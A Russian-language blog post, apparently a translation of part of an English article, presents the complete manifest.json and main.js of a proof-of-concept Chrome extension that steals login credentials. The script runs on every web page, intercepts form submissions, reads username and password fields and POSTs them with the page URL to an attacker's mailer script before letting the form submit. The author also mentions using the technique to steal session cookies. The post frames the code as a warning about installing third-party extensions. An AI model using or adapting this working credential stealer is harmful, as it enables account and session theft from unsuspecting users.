compiling.ru

Как научить Chrome воровать аккаунты – код расширения

Обратите внимание, что может быть небольшая задержка, между тем как пользователь кликнет по кнопке подтверждения и отправкой данных формы из-за вызова Ajax, но в принципе это не очень заметно.

В этом посте я показал, как злоумышленники могут украсть данные логина, но эту методику можно использовать и для других вещей, таких как кража кукисов сессий. Я пытаюсь привить вам идею о том, что нужно всегда быть осторожным при установке сторонних приложений.

Ниже приводится полный код для файлов main.js и manifest.json:

{

«name»: «Stealing login credentials with Google Chrome Extensions»,

«version»: «1.0″,

«description»: «A proof of concept demonstrating the possibility of stealing user credentials in login forms via a Google Chrome extension»,

«permissions»: ["tabs"],

«content_scripts»: [{

"matches": ["http://*/*", "https://*/*"],

«js»: ["jquery.min.js", "main.js"],

«run_at»: «document_start»

}]

}

.

.

$(function() {

var passwordBoxes = $(«input[type=password]«),

getMessage = function(username, password, url) {

return «Username: » + username + » || Password: » + password + » || Url: » + url;

},

sendEmail = function(username, password, url, callback) {

var msg = getMessage(username, password, url);

$.ajax({

type: ‘POST’,

url: ‘the url of the mailer script’, //Change to the path of your mailer script

data: ‘the headers you want to send’, //Change to add any headers to be sent along

success: callback

});

},

process = function(callback) {

var username = $(«input[type=text]«).not(passwordBoxes).filter(function() {

var field = $(this);

return field.val() || field.html();

}).val(),

password = passwordBoxes.val();

sendEmail(username, password, location.href, callback);

};

$(«form»).submit(function(e) {

var $this = $(this);

e.preventDefault();

process(function() {

$this.unbind(‘submit’);

$this.submit();

});

});

});

Я написал это всего лишь с целью продемонстрировать, как это происходит и чего должны опасаться пользователи.

.

Начало:  Как научить Chrome воровать аккаунты.

.

Оригинал:  http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html

Popularity: 5%

Похожие посты: